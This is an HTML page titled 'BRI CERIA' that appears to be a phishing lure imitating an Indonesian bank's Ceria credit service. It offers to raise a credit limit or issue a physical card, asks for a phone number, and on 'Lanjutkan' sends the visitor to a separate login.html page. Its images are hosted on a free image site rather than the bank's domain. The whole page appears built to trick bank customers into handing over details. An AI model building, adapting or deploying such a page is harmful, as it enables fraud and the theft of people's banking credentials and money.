<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BRI CERIA</title>
    <style>
        body {
            margin: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        img {
            width: 100%;
            height: auto;
        }

        .purple-layer {
            background-color: indigo;
            color: white;
            padding: 10px;
            width: 100%;
            box-sizing: border-box;
            margin-bottom: 10px;
        }

        .options {
            display: flex;
            flex-direction: column; /* Mengubah menjadi kolom */
            width: calc(100% - 20px);
            box-sizing: border-box;
            margin-bottom: 10px;
        }

        .options label {
            width: 100%; /* Menyesuaikan lebar label */
            box-sizing: border-box;
            margin-bottom: 10px;
        }

        .phone-input,
        .submit-button {
            width: calc(100% - 20px);
            box-sizing: border-box;
        }

        .phone-input input {
            margin-right: 19px;
            margin-left: 10px;
            width: 100%;
            padding: 12px;
            box-sizing: border-box;
            border-radius: 4px;
            border: none;
            cursor: pointer;
            margin-bottom: 10px;
        }

        .submit-button {
            width: calc(100% - 20px);
            margin-right: 0px;
            margin-left: 0px;
            padding: 14px;
            background-color: #4b0082;
            color: white;
            border: none;
            border-radius: 6px;
            cursor: pointer;
        }

        #gambar-bawah {
            width: 100%;
            box-sizing: border-box;
        }
    </style>
</head>

<body>
    <img src="https://i.ibb.co/t2fqPzf/IMG-20240106-WA0005-removebg-preview.png" alt="Foto Atas">

    <div class="purple-layer">
        <div class="options">
            <label><input type="radio" name="choice" value="tidak"> TINGKATKAN LIMIT CERIA</label>
            <label><input type="radio" name="choice" value="setuju"> BUAT KARTU FISIK CERIA</label>
        </div>

        <div class="phone-input">
            <input type="number" name="phoneNumber" placeholder="Nomor Handphone" required>
        </div>
    </div>

    <button type="button" class="submit-button">Lanjutkan</button>

    <div id="gambar-bawah">
        <img src="https://i.ibb.co/CBfhKfY/IMG-20240106-163823.jpg" alt="Gambar 2711">
    </div>

    <div id="gambar-bawah">
        <img src="https://i.ibb.co/c2BQYp8/IMG-20231229-WA0003-removebg-preview.png" alt="Gambar 2711">
    </div>

    <script>
        document.querySelector('.submit-button').addEventListener('click', function() {
            window.location.href = 'login.html';
        });
    </script>
</body> 
</html>
